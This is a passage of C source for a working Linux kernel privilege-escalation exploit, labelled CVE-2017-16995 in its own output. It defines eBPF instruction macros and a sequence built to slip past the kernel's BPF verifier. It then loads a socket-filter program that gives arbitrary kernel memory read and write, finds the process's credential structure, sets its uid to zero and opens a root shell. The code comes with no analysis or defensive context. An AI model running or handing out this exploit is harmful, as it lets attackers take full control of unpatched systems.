        .off   = 0,                    \
        .imm   = IMM })

#define BPF_MOV64_REG(DST, SRC)                    \
    ((struct bpf_insn) {                    \
        .code  = BPF_ALU64 | BPF_MOV | BPF_X,        \
        .dst_reg = DST,                    \
        .src_reg = SRC,                    \
        .off   = 0,                    \
        .imm   = 0 })

#define BPF_MOV32_REG(DST, SRC)                    \
    ((struct bpf_insn) {                    \
        .code  = BPF_ALU | BPF_MOV | BPF_X,        \
        .dst_reg = DST,                    \
        .src_reg = SRC,                    \
        .off   = 0,                    \
        .imm   = 0 })

#define BPF_MOV64_IMM(DST, IMM)                    \
    ((struct bpf_insn) {                    \
        .code  = BPF_ALU64 | BPF_MOV | BPF_K,        \
        .dst_reg = DST,                    \
        .src_reg = 0,                    \
        .off   = 0,                    \
        .imm   = IMM })

#define BPF_MOV32_IMM(DST, IMM)                    \
    ((struct bpf_insn) {                    \
        .code  = BPF_ALU | BPF_MOV | BPF_K,        \
        .dst_reg = DST,                    \
        .src_reg = 0,                    \
        .off   = 0,                    \
        .imm   = IMM })

#define BPF_LD_IMM64(DST, IMM)                    \
    BPF_LD_IMM64_RAW(DST, 0, IMM)

#define BPF_LD_IMM64_RAW(DST, SRC, IMM)                \
    ((struct bpf_insn) {                    \
        .code  = BPF_LD | BPF_DW | BPF_IMM,        \
        .dst_reg = DST,                    \
        .src_reg = SRC,                    \
        .off   = 0,                    \
        .imm   = (__u32) (IMM) }),            \
    ((struct bpf_insn) {                    \
        .code  = 0,                     \
        .dst_reg = 0,                    \
        .src_reg = 0,                    \
        .off   = 0,                    \
        .imm   = ((__u64) (IMM)) >> 32 })

#ifndef BPF_PSEUDO_MAP_FD
# define BPF_PSEUDO_MAP_FD    1
#endif

#define BPF_LD_MAP_FD(DST, MAP_FD)                \
    BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)


/* Memory load, dst_reg = *(uint *) (src_reg + off16) */
#define BPF_LDX_MEM(SIZE, DST, SRC, OFF)            \
    ((struct bpf_insn) {                    \
        .code  = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM,    \
        .dst_reg = DST,                    \
        .src_reg = SRC,                    \
        .off   = OFF,                    \
        .imm   = 0 })

#define BPF_ST_MEM(SIZE, DST, OFF, IMM)                \
    ((struct bpf_insn) {                    \
        .code  = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM,    \
        .dst_reg = DST,                    \
        .src_reg = 0,                    \
        .off   = OFF,                    \
        .imm   = IMM })

/* Memory store, *(uint *) (dst_reg + off16) = src_reg */
#define BPF_STX_MEM(SIZE, DST, SRC, OFF)            \
    ((struct bpf_insn) {                    \
        .code  = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM,    \
        .dst_reg = DST,                    \
        .src_reg = SRC,                    \
        .off   = OFF,                    \
        .imm   = 0 })

/* Conditional jumps against immediates, if (dst_reg 'op' imm32) goto pc + off16 */
#define BPF_JMP_IMM(OP, DST, IMM, OFF)                \
    ((struct bpf_insn) {                    \
        .code  = BPF_JMP | BPF_OP(OP) | BPF_K,        \
        .dst_reg = DST,                    \
        .src_reg = 0,                    \
        .off   = OFF,                    \
        .imm   = IMM })

/* Raw code statement block */
#define BPF_RAW_INSN(CODE, DST, SRC, OFF, IMM)            \
    ((struct bpf_insn) {                    \
        .code  = CODE,                    \
        .dst_reg = DST,                    \
        .src_reg = SRC,                    \
        .off   = OFF,                    \
        .imm   = IMM })

#define BPF_EXIT_INSN()                        \
    ((struct bpf_insn) {                    \
        .code  = BPF_JMP | BPF_EXIT,            \
        .dst_reg = 0,                    \
        .src_reg = 0,                    \
        .off   = 0,                    \
        .imm   = 0 })

#define BPF_BYPASS_CHECK()                                                       \
    BPF_MOV32_IMM(BPF_REG_2, 0xFFFFFFFF),               \
    BPF_JMP_IMM(BPF_JNE, BPF_REG_2, 0xFFFFFFFF, 2),     \
    BPF_MOV64_IMM(BPF_REG_0, 0),                         \
    BPF_EXIT_INSN()                                     

#define BPF_GET_MAP_FD(idx, dst)                                                                    \
    BPF_MOV64_REG(BPF_REG_1, BPF_REG_9),        /*mov64 reg1, reg9=mapfd*/                          \
    BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),       /*mov64 reg2, fp */                                 \
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),      /*reg2 = reg2-4=fp-4*/                              \
    BPF_ST_MEM(BPF_W, BPF_REG_10, -4, idx),     /*(u64 *)(fp-4) = idx*/                             \
    BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),                              \
    BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),      /*if(r0 == 0){exit(0)}else{jmp 1}*/                 \
    BPF_EXIT_INSN(),                                                                                \
    BPF_LDX_MEM(BPF_DW, dst, BPF_REG_0, 0)      // dst = *(u64 *)(r0)=map[0]

static int load_prog() {
    struct bpf_insn prog[] = {
        BPF_BYPASS_CHECK(),

        BPF_LD_MAP_FD(BPF_REG_9, mapfd),        //r9=mapfd

        BPF_GET_MAP_FD(0, BPF_REG_6),       //r6=map[0]=op
        BPF_GET_MAP_FD(1, BPF_REG_7),       //r7=map[1]=addr
        BPF_GET_MAP_FD(2, BPF_REG_8),       //r8=map[2]=value

        BPF_MOV64_REG(BPF_REG_2, BPF_REG_0),               /* r2 = r0=&map[2]               */
        BPF_MOV64_IMM(BPF_REG_0, 0),                       /* r0 = 0  for exit(0)   */

        //get *(u64 *)(fp)=stack_addr
        BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 0, 2),                //op==0
        BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_10, 0),        //*r2=map[2]=r10=fp
        BPF_EXIT_INSN(),

        //read
        BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 1, 3),            //op==1
        BPF_LDX_MEM(BPF_DW, BPF_REG_3, BPF_REG_7, 0x0),   //r3 = *(r7)
        BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_3, 0),        //*r2=map[2]=r3
        BPF_EXIT_INSN(),

        //write
        BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0),                            //*r7=r8
        BPF_EXIT_INSN(),
    };

    return bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, prog, sizeof(prog), "GPL", 0);
}

void Output(const char *fmt, ...){
    va_list args;
    va_start(args, fmt);
    fprintf(stdout, "[+] ");
    vfprintf(stdout, fmt, args);
    va_end(args);
}

void print(const char *fmt, ...){
    va_list args;
    va_start(args, fmt);
    fprintf(stdout, "[-] ");
    vfprintf(stdout, fmt, args);
    va_end(args);
}

void init_bpf()
{
    Output("CVE-2017-16995\n");

    Output("bpf create map\n");
    mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), sizeof(long long), 3, 0);
    if(mapfd < 0 ){
        Err("bpf map create Error\n");
    }

    Output("load prog\n");
    progfd = load_prog();
    if(progfd < 0 ){
        if(errno == EACCES){
            print("bpf_log_buf: %s\n", bpf_log_buf);
        }
        Err("Load progd Error: %s\n", strerror(errno));
    }

    Output("socket pair\n");
    if(socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets)){
        Err("create socket pair Error %s\n", strerror(errno));
    }

    Output("set sockopt\n");
    if(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) < 0){
        Err("setsockopt %s\n", strerror(errno));
    }
}

static void write_msg(){
    ssize_t n = write(sockets[0], buffer, sizeof(buffer));
    if(n < 0){
        perror("Write");
        return;
    }
    if(n != sizeof(buffer)){
        fprintf(stderr, "short write: %zd\n", n);
    }
}

static void update_elem(int key, unsigned long value){
    if(bpf_update_elem(mapfd, &key, &value, 0)){
        Err("bpf_update_elem error %s\n", strerror(errno));
    }
}

static unsigned long get_value(int key){
    unsigned long value;
    if(bpf_lookup_elem(mapfd, &key, &value)){
        Err("bpf_lookup_elem %s\n", strerror(errno));
    }
    return value;
}

static unsigned long sendcmd(unsigned long op, unsigned long addr, unsigned long value){
    update_elem(0, op);
    update_elem(1, addr);
    update_elem(2, value);
    write_msg();
    return get_value(2);
}

void exp(){
    size_t stack_addr = sendcmd(0, 0, 0);
    print("stack_addr: 0x%llx\n", stack_addr);

    size_t ti_addr = (stack_addr)& ~(0x4000-1);
    print("ti_addr: 0x%llx\n", ti_addr);

    size_t task_addr = sendcmd(1, ti_addr, 0);

    if (task_addr < PHYS_OFFSET)
        Err("bogus task ptr");

    print("task_addr: 0x%llx\n", task_addr);

    size_t cred_addr = task_addr + cred_offset;

    size_t cred = sendcmd(1, cred_addr, 0);
    printf("cred: 0x%llx\n", cred);

    size_t uid_addr = cred + uid_offset;
    printf("uid_addr: 0x%llx\n", uid_addr);

    sendcmd(2, uid_addr, 0);

    if(!getuid()){
        print("You are root now\n");
        system("id");
        system("/bin/sh");
        exit(0);
    }
}

int main(){
    init_bpf();
    exp();
    return 0;
}